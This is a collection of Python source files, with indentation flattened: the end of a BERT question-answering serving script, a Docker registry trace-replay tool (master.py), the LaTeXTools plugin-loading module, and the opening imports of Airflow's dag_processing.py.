#FLAGS.bert_config_file = 'gs://bert_willytest/bert/models/20190910-wwm-cased-40QA-SQuAD2-AtenDocQA-withoutYesNo-max_seq_length-256-doc_stride-128-learning_rate-3e-5/bert_config.json'
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
validate_flags_or_throw(bert_config)
tf.io.gfile.makedirs(FLAGS.output_dir)
tokenizer = tokenization.FullTokenizer(
vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tfori.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
#tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
# FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tfori.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tfori.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tpu_config=tfori.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
train_examples = None
num_train_steps = None
num_warmup_steps = None
if FLAGS.do_retriever:
# Set Document
# ------------------------------------------------------
print('WillyTest...do SQlite')
DOC2IDX, docments = read_sqlite_documents(input_file=FLAGS.db_file)
# ------------------------------------------------------
else:
# Set Document
tf.logging.info("my document_type is %s", FLAGS.document_type)
if FLAGS.document_type is 'Text':
# TODO
print('WillyTest...do Text')
docments = read_text_documents(input_file=FLAGS.predict_file)
elif FLAGS.document_type is 'SQuAD':
# TODO
print('WillyTest...do SQuAD')
docments = read_squad_documents(input_file=FLAGS.predict_file)
# else:
# #raise ValueError("Your document_type: %s is undefined or wrong, please reset it." %(FLAGS.document_type))
if FLAGS.Save_PB_Model == True:
def serving_input_receiver_fn():
feature_spec = {
"input_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"input_mask": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"segment_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"unique_ids": tf.FixedLenFeature([], tf.int64),
}
serialized_tf_example = tf.placeholder(dtype=tf.string,
shape=FLAGS.predict_batch_size,
name='input_example_tensor')
'''
serialized_tf_example = tf.placeholder(dtype=tf.string,
shape=[1],
name='input_example_tensor')
'''
receiver_tensors = {'examples': serialized_tf_example}
features = tf.parse_example(serialized_tf_example, feature_spec)
return tf.estimator.export.ServingInputReceiver(features, receiver_tensors)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
print('Init checkpoint: %s' %FLAGS.init_checkpoint )
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=num_train_steps,
num_warmup_steps=num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
FLAGS.use_tpu = False
estimator = tfori.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
predict_batch_size=FLAGS.predict_batch_size)
estimator._export_to_tpu = False ## !!important to add this
estimator.export_saved_model(
export_dir_base = FLAGS.EXPORT_PATH,
serving_input_receiver_fn = serving_input_receiver_fn)
'''
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
predict_batch_size=FLAGS.predict_batch_size)
estimator._export_to_tpu = False ## !!important to add this
estimator.export_saved_model(
export_dir_base = FLAGS.EXPORT_PATH,
serving_input_receiver_fn = serving_input_receiver_fn)
'''
else:
print("do tcp server")
ranker = retriever.get_class('tfidf')(tfidf_path=FLAGS.retriever_model)
tserver = None
tserver = TcpServer(tokenizer,DOC2IDX)
while tserver == None:
tserver = TcpServer( tokenizer,DOC2IDX)
print("do tcp server-listen")
tserver.listen_client()
if __name__ == "__main__":
flags.mark_flag_as_required("vocab_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
|
master.py
|
import sys
import socket
import os
from argparse import ArgumentParser
import requests
import time
import datetime
import pdb
import random
import threading
import multiprocessing
import json
import yaml
from dxf import *
from multiprocessing import Process, Queue
import importlib
import hash_ring
from mimify import repl
## get requests
def send_request_get(client, payload):
## Read from the queue
s = requests.session()
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
s.post("http://" + str(client) + "/up", data=json.dumps(payload), headers=headers, timeout=100)
def send_warmup_thread(requests, q, registry):
trace = {}
dxf = DXF(registry, 'test_repo', insecure=True)
for request in requests:
if request['size'] < 0:
trace[request['uri']] = 'bad'
try:
dgst = dxf.push_blob(request['data'])
except:
dgst = 'bad'
print request['uri'], dgst
trace[request['uri']] = dgst
q.put(trace)
#######################
# send to registries according to cht
# warmup output file is <uri to dgst > map table
# only consider 'get' requests
# let set threads = n* len(registries)
#######################
def warmup(data, out_trace, registries, threads, numclients):
trace = {}
processes = []
q = Queue()
process_data = []
# nannan
# requests distribution based cht, where digest is blob digest.
# process_data = [[] [] [] [] [] [] [] ... []threads]
# r1 r2 r3 r1 r2 r3
ring = hash_ring.HashRing(registries)
for i in range(threads):
process_data.append([])
i = 0
for request in data:
if request['method'] == 'GET':
uri = request['uri']
layer_id = uri.split('/')[-1]
registry_tmp = ring.get_node(layer_id) # which registry should store this layer/manifest?
idx = registries.index(registry_tmp)
process_data[(idx+(len(registries)*i))%threads].append(request)
print "layer: "+layer_id+"goest to registry: "+registry_tmp+", idx:"+str(idx)
i += 1
for regidx in range(len(registries)):
for i in range(0, threads, len(registries)):
p = Process(target=send_warmup_thread, args=(process_data[regidx+i], q, registries[regidx]))
processes.append(p)
for p in processes:
p.start()
for i in range(threads):
d = q.get()
for thing in d:
if thing in trace:
if trace[thing] == 'bad' and d[thing] != 'bad':
trace[thing] = d[thing]
else:
trace[thing] = d[thing]
for p in processes:
p.join()
with open(out_trace, 'w') as f:
json.dump(trace, f)
#############
# NANNAN: change `onTime` for distributed dedup response
#
##############
def stats(responses):
responses.sort(key = lambda x: x['time'])
endtime = 0
data = 0
latency = 0
total = len(responses)
onTimes = 0
failed = 0
wrongdigest = 0
startTime = responses[0]['time']
for r in responses:
# if r['onTime'] == 'failed':
if "failed" in r['onTime']:
total -= 1
failed += 1
continue
if r['time'] + r['duration'] > endtime:
endtime = r['time'] + r['duration']
latency += r['duration']
data += r['size']
if r['onTime'] == 'yes':
onTimes += 1
if r['onTime'] == 'yes: wrong digest':
wrongdigest += 1
duration = endtime - startTime
print 'Statistics'
print 'Successful Requests: ' + str(total)
print 'Failed Requests: ' + str(failed)
print 'Wrong digest requests: '+str(wrongdigest)
print 'Duration: ' + str(duration)
print 'Data Transfered: ' + str(data) + ' bytes'
print 'Average Latency: ' + str(latency / total)
print '% requests on time: ' + str(1.*onTimes / total)
print 'Throughput: ' + str(1.*total / duration) + ' requests/second'
def serve(port, ids, q, out_file):
server_address = ("0.0.0.0", port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind(server_address)
sock.listen(len(ids))
except:
print "Port already in use: " + str(port)
q.put('fail')
quit()
q.put('success')
i = 0
response = []
print "server waiting"
while i < len(ids):
connection, client_address = sock.accept()
resp = ''
while True:
r = connection.recv(1024)
if not r:
break
resp += r
connection.close()
try:
info = json.loads(resp)
if info[0]['id'] in ids:
info = info[1:]
response.extend(info)
i += 1
except:
print 'exception occured in server'
pass
with open(out_file, 'w') as f:
json.dump(response, f)
print 'results written to ' + out_file
stats(response)
## Get blobs
def get_blobs(data, clients_list, port, out_file):
processess = []
ids = []
for d in data:
ids.append(d[0]['id'])
serveq = Queue()
server = Process(target=serve, args=(port, ids, serveq, out_file))
server.start()
status = serveq.get()
if status == 'fail':
quit()
## Lets start processes
i = 0
for client in clients_list:
p1 = Process(target = send_request_get, args=(client, data[i], ))
processess.append(p1)
i += 1
print "starting client ..."
for p in processess:
p.start()
for p in processess:
p.join()
server.join()
######
# NANNAN: trace_file+'-realblob.json'
######
def get_requests(files, t, limit):
ret = []
for filename in files:
with open(filename+'-realblob.json', 'r') as f:
requests = json.load(f)
for request in requests:
method = request['http.request.method']
uri = request['http.request.uri']
if (('GET' == method) or ('PUT' == method)) and (('manifest' in uri) or ('blobs' in uri)):
size = request['http.response.written']
if size > 0:
timestamp = datetime.datetime.strptime(request['timestamp'], '%Y-%m-%dT%H:%M:%S.%fZ')
duration = request['http.request.duration']
client = request['http.request.remoteaddr']
blob = request['data']
r = {
'delay': timestamp,
'uri': uri,
'size': size,
'method': method,
'duration': duration,
'client': client,
'data': blob
}
ret.append(r)
ret.sort(key= lambda x: x['delay'])
begin = ret[0]['delay']
for r in ret:
r['delay'] = (r['delay'] - begin).total_seconds()
if t == 'seconds':
begin = ret[0]['delay']
i = 0
for r in ret:
if r['delay'] > limit:
break
i += 1
print i
return ret[:i]
elif t == 'requests':
return ret[:limit]
else:
return ret
def absoluteFilePaths(directory):
absFNames = []
for dirpath,_,filenames in os.walk(directory):
for f in filenames:
absFNames.append(os.path.abspath(os.path.join(dirpath, f)))
return absFNames
####
# Random match
# the output file is the last trace filename-realblob.json, which is total trace file.
####
def match(realblob_locations, trace_files):
print realblob_locations, trace_files
blob_locations = []
tTOblobdic = {}
blobTOtdic = {}
ret = []
i = 0
for location in realblob_locations:
absFNames = absoluteFilePaths(location)
print "Dir: "+location+" has the following files"
print absFNames
blob_locations.extend(absFNames)
for trace_file in trace_files:
with open(trace_file, 'r') as f:
requests = json.load(f)
for request in requests:
method = request['http.request.method']
uri = request['http.request.uri']
if len(uri.split('/')) < 3:
continue
layer_id = uri.rsplit('/', 1)[1]
usrname = uri.split('/')[1]
repo_name = uri.split('/')[2]
if (('GET' == method) or ('PUT' == method)) and (('manifest' in uri) or ('blobs' in uri)):
size = request['http.response.written']
if size > 0:
if i < len(blob_locations):
blob = blob_locations[i]
if layer_id in tTOblobdic.keys():
continue
if blob in blobTOtdic.keys():
continue
tTOblobdic[layer_id] = blob
blobTOtdic[blob] = layer_id
size = os.stat(blob).st_size
r = {
"host": request['host'],
"http.request.duration": request['http.request.duration'],
"http.request.method": request['http.request.method'],
"http.request.remoteaddr": request['http.request.remoteaddr'],
"http.request.uri": request['http.request.uri'],
"http.request.useragent": request['http.request.useragent'],
"http.response.status": request['http.response.status'],
"http.response.written": size,
"id": request['id'],
"timestamp": request['timestamp'],
'data': blob
}
print r
ret.append(r)
i += 1
with open(trace_file+'-realblob.json', 'w') as fp:
json.dump(ret, fp)
##############
# NANNAN: round_robin is false!
# "http.request.duration": 1.005269323,
# "http.request.uri": "v2/4715bf52/437c49db/blobs/93054319",
# "host": "dc118836",
# "http.request.useragent": "docker/17.03.1-ce go/go1.7.5 git-commit/c6d412e kernel/4.4.0-78-generic os/linux arch/amd64 UpstreamClient(Docker-Client/17.03.1-ce \\(linux\\))",
# "timestamp": "2017-06-20T02:41:18.399Z",
# "id": "ed29d65dbd",
# "http.response.written": 9576,
# "http.response.status": 200,
# "http.request.method": "GET",
# "http.request.remoteaddr": "0ee76ffa"
##############
def organize(requests, out_trace, numclients, client_threads, port, wait, registries, round_robin, push_rand, replay_limits):
organized = []
if round_robin is False:
ring = hash_ring.HashRing(range(numclients))
with open(out_trace, 'r') as f:
blob = json.load(f)
for i in range(numclients):
organized.append([{'port': port, 'id': random.getrandbits(32), 'threads': client_threads, 'wait': wait, 'registry': registries, 'random': push_rand}])
print organized[-1][0]['id']
i = 0
cnt = 0
for r in requests:
cnt += 1
if replay_limits > 0:
if cnt > replay_limits:
break
request = {
'delay': r['delay'],
'duration': r['duration'],
'data': r['data']
}
if r['uri'] in blob:
b = blob[r['uri']]
if b != 'bad':
request['blob'] = b # dgest
request['method'] = 'GET'
if round_robin is True:
organized[i % numclients].append(request)
i += 1
else:
organized[ring.get_node(r['client'])].append(request)
else:
request['size'] = r['size']
request['method'] = 'PUT'
if round_robin is True:
organized[i % numclients].append(request)
i += 1
else:
organized[ring.get_node(r['client'])].append(request)
return organized
def main():
parser = ArgumentParser(description='Trace Player, allows for anonymized traces to be replayed to a registry, or for caching and prefecting simulations.')
parser.add_argument('-i', '--input', dest='input', type=str, required=True, help = 'Input YAML configuration file, should contain all the inputs requried for processing')
parser.add_argument('-c', '--command', dest='command', type=str, required=True, help= 'Trace player command. Possible commands: warmup, run, simulate, warmup is used to populate the registry with the layers of the trace, run replays the trace, and simulate is used to test different caching and prefecting policies.')
args = parser.parse_args()
config = file(args.input, 'r')
try:
inputs = yaml.load(config)
except Exception as inst:
print 'error reading config file'
print inst
exit(-1)
verbose = False
if 'verbose' in inputs:
if inputs['verbose'] is True:
verbose = True
print 'Verbose Mode'
if 'trace' not in inputs:
print 'trace field required in config file'
exit(1)
trace_files = []
if 'location' in inputs['trace']:
location = inputs['trace']['location']
if '/' != location[-1]:
location += '/'
for fname in inputs['trace']['traces']:
trace_files.append(location + fname)
else:
trace_files.extend(inputs['trace']['traces'])
if verbose:
print 'Input traces'
for f in trace_files:
print f
limit_type = None
limit = 0
if 'limit' in inputs['trace']:
limit_type = inputs['trace']['limit']['type']
if limit_type in ['seconds', 'requests']:
limit = inputs['trace']['limit']['amount']
else:
print 'Invalid trace limit_type: limit_type must be either seconds or requests'
print exit(1)
elif verbose:
print 'limit_type not specified, entirety of trace files will be used will be used.'
if 'output' in inputs['trace']:
out_file = inputs['trace']['output']
else:
out_file = 'output.json'
if verbose:
print 'Output trace not specified, ./output.json will be used'
generate_random = False
if args.command != 'simulate':
if "warmup" not in inputs or 'output' not in inputs['warmup']:
print 'warmup not specified in config, warmup output required. Exiting'
exit(1)
else:
interm = inputs['warmup']['output']
if 'random' in inputs['warmup']:
if inputs['warmup']['random'] is True:
generate_random = True
registries = []
if 'registry' in inputs:
registries.extend(inputs['registry'])
#NANNAN
if args.command == 'match':
if 'realblobs' in inputs['client_info']:
realblob_locations = inputs['client_info']['realblobs']
match(realblob_locations, trace_files)
return
else:
print "please write realblobs in the config files"
return
# replay_limits = 0
# if 'debugging' in inputs['client_info']:
# if inputs['client_info']['debugging'] is True:
# replay_limits = inputs['client_info']['debugging']['limits']
json_data = get_requests(trace_files, limit_type, limit)
if args.command == 'warmup':
if verbose:
print 'warmup mode'
if 'threads' in inputs['warmup']:
threads = inputs['warmup']['threads']
else:
threads = 1
if verbose:
print 'warmup threads: ' + str(threads)
# NANNAN: not sure why only warmup a single registry, let's warmup all.
warmup(json_data, interm, registries, threads, generate_random)
elif args.command == 'run':
if verbose:
print 'run mode'
if 'client_info' not in inputs or inputs['client_info'] is None:
print 'client_info required for run mode in config file'
print 'exiting'
exit(1)
if 'port' not in inputs['client_info']:
if verbose:
print 'master server port not specified, assuming 8080'
port = 8080
else:
port = inputs['client_info']['port']
if verbose:
print 'master port: ' + str(port)
if 'threads' not in inputs['client_info']:
if verbose:
print 'client threads not specified, 1 thread will be used'
client_threads = 1
else:
client_threads = inputs['client_info']['threads']
if verbose:
print str(client_threads) + ' client threads'
if 'client_list' not in inputs['client_info']:
print 'client_list entries are required in config file'
exit(1)
else:
client_list = inputs['client_info']['client_list']
if 'wait' not in inputs['client_info']:
if verbose:
print 'Wait not specified, clients will not wait'
wait = False
elif inputs['client_info']['wait'] is True:
wait = True
else:
wait = False
round_robin = True
if 'route' in inputs['client_info']:
if inputs['client_info']['route'] is True:
round_robin = False
data = organize(json_data, interm, len(client_list), client_threads, port, wait, registries, round_robin, generate_random)
## Perform GET
get_blobs(data, client_list, port, out_file)
elif args.command == 'simulate':
if verbose:
print 'simulate mode'
if 'simulate' not in inputs:
print 'simulate file required in config'
exit(1)
pi = inputs['simulate']['name']
if '.py' in pi:
pi = pi[:-3]
try:
plugin = importlib.import_module(pi)
except Exception as inst:
print 'Plugin did not work!'
print inst
exit(1)
try:
if 'args' in inputs['simulate']:
plugin.init(json_data, inputs['simulate']['args'])
else:
plugin.init(json_data)
except Exception as inst:
print 'Error running plugin init!'
print inst
if __name__ == "__main__":
main()
|
latextools_plugin.py
|
'''
Plugin auto-discovery system intended for use in LaTeXTools package.
Overview
========
A plugin is a Python class that extends LaTeXToolsPlugin and provides some
functionality, usually via a function, that LaTeXTools code interacts with.
This module provide mechanisms for loading such plugins from arbitrary files
and configuring the environment in which they are used. It tries to make as
few assumptions as possible about how the consuming code and the plugin
interact. At it's heart it is just a plugin registry.
A quick example plugin:
from latextools_plugin import LaTeXToolsPlugin
class PluginSample(LaTeXToolsPlugin):
def do_something():
pass
And example consuming code:
from latextools_plugin import get_plugin
plugin = get_plugin('plugin_sample')
# instantiate and use the plugin
plugin().do_something()
Note that we make no assumption about how plugins are used, just how they are
loaded. It is up to the consuming code to provide a protocol for interaction,
i.e., methods that will be called, etc.
As shown above, plugin others should import and sub-class the
`LaTeXToolsPlugin` class from this module, as this will ensure the plugin is
properly registered and so available to consuming code. Plugins are registered
by using a version of the class name, so it is important that all plugins used
have a unique class name. The conversion is similar to how Sublime handles
*Command objects, so the name is converted from CamelCase to snake_case. In
addition, the word "Plugin", if it occurs at the end of the class name, is
removed.
Consuming code loads a plugin from the registry by passing the converted plugin
name to the `get_plugin()` function defined in this class. What is returned is
the class itself, i.e., it is the responsibility of the consuming code to
initialize the plugin and then interact with it.
Finding Plugins
===============
The following loading mechanisms for plugins are provided, either using
configuration options or the `add_plugin_path()` function defined in this
module.
Configuration options:
`plugin_paths`: in the standard user configuration.
A list of either directories to search for plugins or paths to
plugins.
Defaults to an empty list, in which case nothing will be done.
Paths can either be specified as absolute paths, paths relative to the
LaTeXTools package or paths relative to the User package. Paths in the
User package will mask paths in the LaTeXTools package. This is
intended to emulate the behaviour of ST.
If the default glob of *.py is unacceptable, the path can instead be
specified as a tuple consisting of the path and the glob to use. The
glob *must* be compatible with the Python glob module. E.g.,
```json
"plugin_paths": [['latextools_plugins', '*.py3']]
```
will load all .py3 files in the `latextools_plugins` subdirectory of
the User package.
API:
`add_plugin_path()`: can be used in a manner similar to the `plugin_paths`
configuration option. Its required argument is the path to be search, which
can be specified either relative to the LaTeXTools package, the User
package or as an absolute path. In addition it takes an optional argument
of the glob to use to identify plugin files. The main purpose is to allow
LaTeXTools code to register a default location to load plugins from.
The Plugin Environment
======================
The plugin environment will be setup so that the directory containing the
plugin is the first entry on sys.path, enabling import of any modules located
in the same folder, according to standard Python import rules. In addition, the
standard modules available to SublimeText are available. In addition, a small
number of modules from LaTeXTools itself can be made available. This list of
modules can be configured either through the `plugins_whitelist` configuration
option in the settings file or by using the `add_whitelist_module()` function
defined in this module.
Configuration options:
`plugins_whitelist`:
A list of LaTeXTools module names to be made available via sys.modules
when loading plugins. This names do not need to be the fully
qualified name, but should be the name of the module relative to the
LaTeXTools folder (i.e. "latextools_utils" rather than
"LaTeXTools.latextools_utils") as this ensures compatibility between
ST2 and ST3.
API:
`add_whitelist_module()`: can be used in a manner similar to the
`plugins_whitelist` option described above, i.e. called with the name of a
module to add to the list of modules available in sys.modules when a
LaTeXTools plugin is loaded. The optional argument, `module`, if used
should be a Python module object (normally obtained from `sys.modules`).
This is primarily intended to expose a module that would not otherwise be
available or expose an already available module to plugins under a
different name.
'''
from __future__ import print_function
import sublime
import glob as _glob
import os
import sys
import threading
import traceback
from contextlib import contextmanager
from collections import MutableMapping
try:
from latextools_utils import get_setting
import latextools_plugin_internal as internal
except ImportError:
from .latextools_utils import get_setting
from . import latextools_plugin_internal as internal
__all__ = [
'LaTeXToolsPlugin', 'get_plugin', 'get_plugins_by_type',
'add_plugin_path', 'LaTeXToolsPluginException', 'InvalidPluginException',
'NoSuchPluginException'
]
# this is used to load plugins and not interfere with other modules
_MODULE_PREFIX = '_latextools_'
# -- Public API --#
# exceptions
class LaTeXToolsPluginException(Exception):
'''
Base class for plugin-related exceptions
'''
pass
class NoSuchPluginException(LaTeXToolsPluginException):
'''
Exception raised if an attempt is made to access a plugin that does not
exist
Intended to allow the consumer to provide the user with some more useful
information e.g., how to properly configure a module for an extension point
'''
pass
class InvalidPluginException(LaTeXToolsPluginException):
'''
Exception raised if an attempt is made to register a plugin that is not a
subclass of LaTeXToolsPlugin.
'''
pass
LaTeXToolsPlugin = internal.LaTeXToolsPlugin
# methods for consumers
def add_plugin_path(path, glob='*.py'):
'''
This function adds plugins from a specified path.
It is primarily intended to be used by consumers to load plugins from a
custom path without needing to access the internals. For example, consuming
code could use this to load any default plugins
`glob`, if specified should be a valid Python glob. See the `glob` module.
'''
if (path, glob) not in internal._REGISTERED_PATHS_TO_LOAD:
internal._REGISTERED_PATHS_TO_LOAD.append((path, glob))
# if we are called before `plugin_loaded`
if internal._REGISTRY is None:
return
previous_plugins = set(internal._REGISTRY.keys())
with _latextools_module_hack():
if not os.path.exists(path):
return
if os.path.isfile(path):
plugin_dir = os.path.dirname(path)
sys.path.insert(0, plugin_dir)
_load_plugin(os.path.basename(path), plugin_dir)
sys.path.pop(0)
else:
for file in _glob.iglob(os.path.join(path, glob)):
plugin_dir = os.path.dirname(file)
sys.path.insert(0, plugin_dir)
_load_plugin(os.path.basename(file), plugin_dir)
sys.path.pop(0)
print('Loaded LaTeXTools plugins {0} from path {1}'.format(
list(set(internal._REGISTRY.keys()) - previous_plugins),
path))
def add_whitelist_module(name, module=None):
'''
API function to ensure that a certain module is made available to any
plugins.
`name` should be the name of the module as it will be imported in a plugin
`module`, if specified, should be either an actual module object or a
callable that returns the actual module object.
The `module` mechanism is provided to allow for the import of modules that
might otherwise be unavailable or available in sys.modules only by a
different name. Standard LaTeXTools modules should provide a name only.
Note that this function *must* be called before add_plugin_path.
'''
for i, (_name, _module) in enumerate(internal._WHITELIST_ADDED):
if _name == name:
if _module == module:
return
internal._WHITELIST_ADDED[i] = (_name, module)
return
internal._WHITELIST_ADDED.append((name, module))
def get_plugin(name):
'''
This is intended to be the main entry-point used by consumers (not
implementors) of plugins, to find any plugins that have registered
themselves by name.
If a plugin cannot be found, a NoSuchPluginException will be thrown. Please
try to provide the user with any helpful information.
Use case:
Provide the user with the ability to load a plugin by a memorable name,
e.g., in a settings file.
For example, 'biblatex' will get the plugin named 'BibLaTeX', etc.
'''
if internal._REGISTRY is None:
raise NoSuchPluginException(
'Could not load plugin {0} because the registry either hasn\'t ' +
'been loaded or has just been unloaded.'.format(name)
)
return internal._REGISTRY[name]
def get_plugins_by_type(cls):
if internal._REGISTRY is None:
raise NoSuchPluginException(
'No plugins could be loaded because the registry either hasn\'t '
'been loaded or has been unloaded'
)
plugins = [plugin for _, plugin in internal._REGISTRY.items()
if issubclass(plugin, cls)]
return plugins
# -- Private API --#
if sys.version_info < (3, 0):
exec("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
import imp
def _load_module(module_name, filename, *paths):
name, ext = os.path.splitext(filename)
if ext in ('.py', ''):
f, path, description = imp.find_module(name, list(paths))
try:
module = imp.load_module(module_name, f, path, description)
finally:
if f:
f.close()
else:
module = None
exc_info = None
for path in paths:
p = os.path.normpath(os.path.join(path, filename))
if os.path.exists(p):
try:
module = imp.load_source(module_name, filename)
except ImportError:
exc_info = sys.exc_info()
if not module and exc_info:
reraise(*exc_info)
return module
strbase = basestring
FileNotFoundError = IOError
else:
from importlib.machinery import PathFinder, SourceFileLoader
from imp import reload
# WARNING:
# imp module is deprecated in 3.x, unfortunately, importlib does not seem
# to have a stable API, as in 3.4, `find_module` is deprecated in favour of
# `find_spec` and discussions of how best to provide access to the import
# internals seem to be on-going
def _load_module(module_name, filename, *paths):
name, ext = os.path.splitext(filename)
if ext in ('.py', ''):
loader = PathFinder.find_module(name, path=paths)
if loader is None:
loader = PathFinder.find_module(name)
if loader is None:
raise ImportError(
'Could not find module {} on path {} or sys.path'.format(
name, paths))
else:
loader = None
for path in paths:
p = os.path.normpath(os.path.join(path, filename))
if os.path.exists(p):
loader = SourceFileLoader(module_name, p)
if loader is None:
raise ImportError(
'Could not find module {} on path {}'.format(name, paths))
loader.name = module_name
return loader.load_module()
strbase = str
if sublime.version() < '3000':
import latextools_plugin_internal as internal
def _get_sublime_module_name(_, module):
return module
else:
from . import latextools_plugin_internal as internal
def _get_sublime_module_name(directory, module):
return '{0}.{1}'.format(os.path.basename(directory), module)
class LaTeXToolsPluginRegistry(MutableMapping):
'''
Registry used internally to store references to plugins to be retrieved
by plugin consumers.
'''
def __init__(self):
self._registry = {}
def __getitem__(self, key):
try:
return self._registry[key]
except KeyError:
raise NoSuchPluginException(
'Plugin {0} does not exist. Please ensure that the plugin is '
'configured as documented'.format(key)
)
def __setitem__(self, key, value):
if not isinstance(value, internal.LaTeXToolsPluginMeta):
raise InvalidPluginException(value)
self._registry[key] = value
def __delitem__(self, key):
del self._registry[key]
def __iter__(self):
return iter(self._registry)
def __len__(self):
return len(self._registry)
def __str__(self):
return str(self._registry)
_classname_to_internal_name = internal._classname_to_internal_name
def _get_plugin_paths():
plugin_paths = get_setting('plugin_paths', [])
return plugin_paths
def _load_plugin(filename, *paths):
name, ext = os.path.splitext(filename)
# hopefully a unique-enough module name!
if not ext or ext == '.py':
module_name = '{0}{1}'.format(_MODULE_PREFIX, name)
else:
module_name = '{0}{1}_{2}'.format(_MODULE_PREFIX, name, ext[1:])
if module_name in sys.modules:
try:
return sys.modules[module_name]
except ImportError:
# On ST2, this appears to be triggered on the initial reload and
# fails, so instead of reloading just continue to run the loading
# code
pass
except FileNotFoundError:
# A previous plugin has been moved or removed, so just reload it
pass
try:
return _load_module(module_name, filename, *paths)
except:
print('Could not load module {0} using path {1}.'.format(name, paths))
traceback.print_exc()
return None
def _load_plugins():
def _resolve_plugin_path(path):
if not os.path.isabs(path):
p = os.path.normpath(
os.path.join(sublime.packages_path(), 'User', path))
if not os.path.exists(p):
p = os.path.normpath(
os.path.join(sublime.packages_path(), 'LaTeXTools', path))
return p
return path
for path in _get_plugin_paths():
if type(path) == strbase:
add_plugin_path(_resolve_plugin_path(path))
else:
try:
# assume path is a tuple of [<path>, <glob>]
add_plugin_path(_resolve_plugin_path(path[0]), path[1])
except:
print(
'An error occurred while trying to add the plugin '
'path {0}'.format(path))
traceback.print_exc()
@contextmanager
def _latextools_module_hack():
'''
Context manager to ensure sys.modules has certain white-listed modules,
most especially latextools_plugins. This exposes some of the modules in
LaTeXTools to plugins. It is intended primarily to expose library-esque
functionality, such as the getTeXRoot module, but can be configured by
the user as-needed.
'''
# add any white-listed plugins to sys.modules under their own name
plugins_whitelist = get_setting(
'plugins_whitelist',
['external', 'getTeXRoot', 'latextools_utils']
)
# always include latextools_pluing
plugins_whitelist.append('latextools_plugin')
overwritten_modules = {}
whitelist = [(name, None) for name in plugins_whitelist]
whitelist.extend(internal._WHITELIST_ADDED)
# put the directory containing this file on the sys.path
__dir__ = os.path.dirname(__file__)
# handles ST2s relative directory
if __dir__ == '.':
__dir__ = os.path.join(sublime.packages_path(), 'LaTeXTools')
# insert the LaTeXTools directory on the path
sys.path.insert(0, __dir__)
for name, module in whitelist:
if callable(module):
module = module()
if name in sys.modules:
overwritten_modules[name] = sys.modules[name]
# attempting to autoload module
if module is None:
# if the module has already been loaded by ST, we just use that
latextools_module_name = _get_sublime_module_name(__dir__, name)
if latextools_module_name in sys.modules:
sys.modules[name] = sys.modules[latextools_module_name]
else:
try:
sys.modules[name] = _load_module(name, name, __dir__)
except ImportError:
print(
'An error occurred while trying to load white-listed '
'module {0}'.format(name)
)
traceback.print_exc()
else:
sys.modules[name] = module
# remove the LaTeXTools directory from the path
sys.path.pop(0)
yield
# restore any temporarily overwritten modules and clear our loaded modules
for module in plugins_whitelist:
if _get_sublime_module_name(__dir__, module) != module:
del sys.modules[module]
if module in overwritten_modules:
sys.modules[module] = overwritten_modules[module]
# load plugins when the Sublime API is available, just in case...
def plugin_loaded():
t = threading.Thread(target=_plugin_loaded)
t.daemon = True
t.start()
def _plugin_loaded():
internal._REGISTRY = LaTeXToolsPluginRegistry()
print('Loading LaTeXTools plugins...')
for name, cls in internal._REGISTERED_CLASSES_TO_LOAD:
internal._REGISTRY[name] = cls
_load_plugins()
for path, glob in internal._REGISTERED_PATHS_TO_LOAD:
add_plugin_path(path, glob)
# ensure plugin_loaded() called on ST2
if sublime.version() < '3000' and internal._REGISTRY is None:
plugin_loaded()
|
dag_processing.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import logging
import multiprocessing
import os
import signal
import sys
import time
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from importlib import import_module
from typing import Any, Callable, Dict, KeysView, List, NamedTuple, Optional, Tuple
import psutil
from setproctitle import setproctitle # pylint: disable=no-name-in-module
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.models import Connection, errors
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.settings import STORE_SERIALIZED_DAGS
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.db import provide_session
